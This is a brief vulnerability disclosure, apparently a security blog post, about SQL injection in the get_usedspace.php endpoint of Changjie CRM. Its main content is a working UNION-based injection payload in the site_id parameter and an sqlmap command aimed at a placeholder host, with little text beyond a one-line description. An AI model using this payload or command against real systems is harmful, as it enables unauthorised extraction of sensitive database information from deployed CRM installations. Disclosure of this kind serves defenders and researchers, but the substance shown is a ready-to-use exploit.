Changjie Crm Get_usedspace Php Sql Injection Vulnerability
Changjie Crm Get_usedspace Php Sql Injection Vulnerability
Changjie CRM get_usedspace.php SQL injection vulnerability
Vulnerability Description
Changjie CRM get_usedspace.php has SQL vulnerability, and database sensitive information can be obtained through the vulnerability
Vulnerability Impact
Changjie CRM
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--
Verification vulnerability using Sqlmap
1
sqlmap -u "https://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id
This post is licensed under CC BY 4.0 by the author.